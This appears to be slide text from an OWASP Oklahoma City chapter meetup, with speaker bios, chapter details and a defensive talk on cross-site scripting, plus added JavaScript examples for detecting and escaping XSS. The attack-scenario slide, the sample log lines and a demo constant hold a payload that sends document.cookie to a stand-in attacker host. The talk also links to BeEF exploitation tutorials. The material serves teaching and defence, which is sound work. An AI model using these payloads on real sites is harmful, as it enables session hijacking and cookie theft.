Oklahoma City.


Oklahoma City

Welcome! Thanks to our sponsors! OWASP RCB Bank Crossroads Information Security

Joe Sullivan
Started in Infosec with a web hosting company in 1999
Started one of the first outsourced support companies for web hosting servers in 2000
Worked for an ecommerce company for 10 years in network security
Currently CISO for RCB Bank
1 to 1 Risk Control & Investigations – Owner/Lead Investigator
Consulting for Crossroads Information Security
SANS Mentor, SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

Jim Thavisouk
Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer. He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including the Department of Defense and the Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corps program.

Stacy Dunn
OWASP Oklahoma City Chapter Leader
Information Security Analyst, RCB Bank
Board Member of Super! BitCon, a local gaming convention.
Curator and Founder at Oklahoma Artcade.
Super nerd.

Contact Information
Joe Sullivan: joe.sullivan@owasp.org
Jim Thavisouk: jim.thavisouk@owasp.org
Stacy Dunn: stacy.dunn@owasp.org

Oklahoma City Chapter
The official page is at: https://www.owasp.org/index.php/Oklahoma_City
Twitter: @okcowasp
FaceBook
YouTube
MeetUp: https://www.meetup.com/Oklahoma-City-Chapter-Meetup/
https://owasp.herokuapp.com/ <- Join us on Slack!

OWASP The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

OWASP Top 10 The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

OWASP Top 10 2017

Membership
Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page.
Membership is optional
Meetings are open to everyone
Guests are welcome
Memberships help fund our chapter

Meetings
Web Application Security
Web Application Development
Presentations
Labs
Networking
Round Tables
Food

The Future
Conferences (IWS Coming Up)
Speakers
Presentations
News
Challenge Coins
Promo Materials
Volunteers are welcome!

Speaking of Presentations: Cross Site Scripting
XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.
Better described as a code reflection attack.
How this works: an attacker crafts a URL with a script in it. The script in the URL is sent to the server as input. When the user accesses the URL, the server reflects back the script contained in the URL. The user's browser processes the script and performs whatever action the script was set to run.

Cross Site Scripting Attack Scenario
HTML without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
Attacker modifies the CC parameter to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.

More Cross Site Scripting Attacks
Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning)
Attacking log viewers and user interfaces with XSS
Using the Browser Exploitation Framework (BeEF) to attack browsers: https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/
Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more.
Good for getting a foothold on a network.

Detecting Cross Site Scripting Attacks
This is a noisy attack: it generates logs.
SIEM can detect attacks, but may miss obfuscation techniques.
IPS can alert to XSS attacks.
IDS can alert to XSS attacks.
Web application firewall.
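The detection slide's caveat that a SIEM rule can miss obfuscation is easy to see on log data. The following is an added example, not code from the presentation or from any of the tools it names: a minimal reflected-XSS detector run over constructed access log lines (the hosts, paths and payloads are invented). A rule that matches the raw log line only sees the plain-text payload; decoding the request target first also catches URL-encoded and double-encoded variants of the same payload.

```javascript
// Added example, not code from the presentation: a minimal reflected-XSS
// detector over constructed web-server access log lines. A raw substring
// match sees only the plain payload; decoding the request target first also
// catches URL-encoded and double-encoded variants.

// Constructed sample lines in Combined Log Format; hosts and paths are invented.
const SAMPLE_LOG = [
  `10.0.0.5 - - [01/Jan/2019:10:00:01 -0600] "GET /account?CC=4111111111111111 HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
  `10.0.0.9 - - [01/Jan/2019:10:00:02 -0600] "GET /account?CC='><script>document.location='http://attacker.example/c?x='+document.cookie</script> HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
  `10.0.0.9 - - [01/Jan/2019:10:00:03 -0600] "GET /account?CC=%27%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2Fc%3Fx%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
  `10.0.0.9 - - [01/Jan/2019:10:00:04 -0600] "GET /account?CC=%2527%253E%253Cscript%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
];

// Indicators of script injection. Deliberately short; a production rule set
// is much larger and has to be tuned against false positives.
const XSS_PATTERNS = [/<script\b/i, /javascript:/i, /\bonerror\s*=/i, /\bonload\s*=/i];

// Pull the request target (path + query) out of a Combined Log Format line.
function extractRequestTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) ([^ ]+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Percent-decode repeatedly (bounded) so double-encoded payloads normalize
// too; a malformed escape sequence ends decoding instead of throwing.
function normalizeTarget(target, maxRounds = 3) {
  let current = target;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current.replace(/\+/g, ' '));
    } catch (err) {
      break;
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current;
}

// Sources of the patterns that fire on a string.
function matchIndicators(text) {
  return XSS_PATTERNS.filter((re) => re.test(text)).map((re) => re.source);
}

// Naive rule: match the raw log line as written.
function detectNaive(lines) {
  return lines.filter((line) => matchIndicators(line).length > 0);
}

// Decoding rule: match the normalized request target, and report the source
// address and which indicators fired so an analyst can triage the hit.
function detectDecoded(lines) {
  const hits = [];
  for (const line of lines) {
    const target = extractRequestTarget(line);
    if (target === null) continue;
    const indicators = matchIndicators(normalizeTarget(target));
    if (indicators.length > 0) {
      hits.push({ source: line.split(' ')[0], target, indicators });
    }
  }
  return hits;
}
```

On the four constructed lines the naive rule flags one request and the decoding rule flags three; the remaining line is a legitimate card number and matches neither. The bounded decode loop matters: decoding once misses the double-encoded line, and decoding without a bound is a denial-of-service risk on hostile input.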

Preventing Cross Site Scripting
Filter out meta characters from requests; do this on the server side, not the client side.
Microsoft offers a free anti-XSS library.
Use frameworks that automatically escape XSS by design, such as the latest Ruby on Rails or React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.
Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.
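To tie the attack-scenario slide to the context-aware escaping this slide recommends, here is an added example (not code from the presentation, and not the Microsoft library or any framework's encoder): the credit-card input field rendered the way the slide's Java snippet does it, next to a version that encodes the untrusted CC parameter for the HTML attribute context before concatenation. The attacker host name and field values are constructed for the example.

```javascript
// Added example, not code from the presentation: the credit-card input from
// the attack-scenario slide rendered two ways, the original string
// concatenation and a version that escapes the untrusted parameter for the
// HTML attribute context, as the OWASP XSS Prevention Cheat Sheet describes.
// Host name and field values below are constructed for the example.

// Escape the characters that can close an attribute value or open a tag.
// This is the HTML body/attribute encoding rule; JavaScript, CSS and URL
// contexts need their own encoders and are not covered here.
function escapeHtml(untrusted) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
  };
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Same construction as the slide's Java snippet: the CC parameter is pasted
// straight into a single-quoted attribute value.
function renderUnsafe(ccParam) {
  return "<input name='creditcard' type='TEXT' value='" + ccParam + "'>";
}

// Hardened version: the parameter is encoded for the attribute context first,
// so a quote in the input cannot terminate the attribute.
function renderSafe(ccParam) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtml(ccParam) + "'>";
}

// Crude stand-in for the browser's tokenizer: is there a script start tag
// anywhere in the markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload with the same shape as the slide's; attacker host replaced.
const PAYLOAD =
  "'><script>document.location='http://attacker.example/cookie.cgi?foo='+document.cookie</script>'";

// Both renderings side by side for a quick comparison.
function demo() {
  return { unsafe: renderUnsafe(PAYLOAD), safe: renderSafe(PAYLOAD) };
}
```

With the unescaped rendering the leading quote closes the value attribute and the browser sees a real script element; with the escaped rendering the whole payload stays inside the attribute as inert text, and a normal card number renders unchanged. The encoder here is only correct for HTML body and attribute contexts, which is the point of the slide's "based on the context" wording: the same value placed inside a script block or a URL needs a different encoder.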

Preventing Cross Site Scripting
Run web application penetration tests regularly.
Test when changes are implemented to the web application.
Test when new attacks come out.
Work with your web application developer on testing and remediation.

Discussion
What would you like to get out of our meetings?
Web Application Security
Vulnerability Testing and Remediation
Development
Security Operations
Penetration Testing
Incident Response
Defending Web Applications